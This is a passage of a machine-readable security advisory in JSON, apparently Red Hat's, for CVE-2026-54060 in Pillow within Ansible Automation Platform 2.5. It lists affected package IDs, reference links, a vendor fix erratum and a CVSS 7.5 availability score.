"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el8ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-54060"
},
{
"category": "external",
"summary": "RHBZ#2497466",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497466"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-54060",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-54060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54060"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst",
"url": "https://github.com/python-pillow/Pillow/blob/main/docs/releasenotes/12.3.0.rst"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d",
"url": "https://github.com/python-pillow/Pillow/commit/0a263e6264aa5399988d9acd3bbfbca2ca3ec77d"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-5x94-69rx-g8h2"
}
],
"release_date": "2026-07-06T18:49:23.788000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:10:56+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50319"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Developer-1.2:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5-Inside-1.3:receptorctl-0:1.6.7-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-cli-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-server-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-ui-0:4.6.31-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-controller-venv-tower-0:4.6.31-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-0:1.1.21-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-base-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-event-stream-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-eda-controller-worker-services-0:1.1.21-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-0:2.5.20260804-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-config-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-debugsource-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-proxy-server-debuginfo-0:2.5.10-7.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:automation-gateway-server-0:2.5.20260804-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:automation-hub-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debuginfo-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-aiohttp-debugsource-0:3.14.1-2.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-daphne-0:4.2.2-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-galaxy-ng-0:4.10.17-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debuginfo-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pillow-debugsource-0:12.3.0-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pulpcore-0:3.49.66-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.noarch",
"8Base-Ansible-Automation-Platform-2.5:python3.12-pyasn1-0:0.6.4-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.src",
"8Base-Ansible-Automation-Platform-2.5:receptor-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.aarch64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.ppc64le",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.s390x",
"8Base-Ansible-Automation-Platform-2.5:receptor-debuginfo-0:1.6.7-1.el8ap.x86_64",
"8Base-Ansible-Automation-Platform-2.5:receptor-debugsource-0:1.6.7-1.el8ap.aarch64",
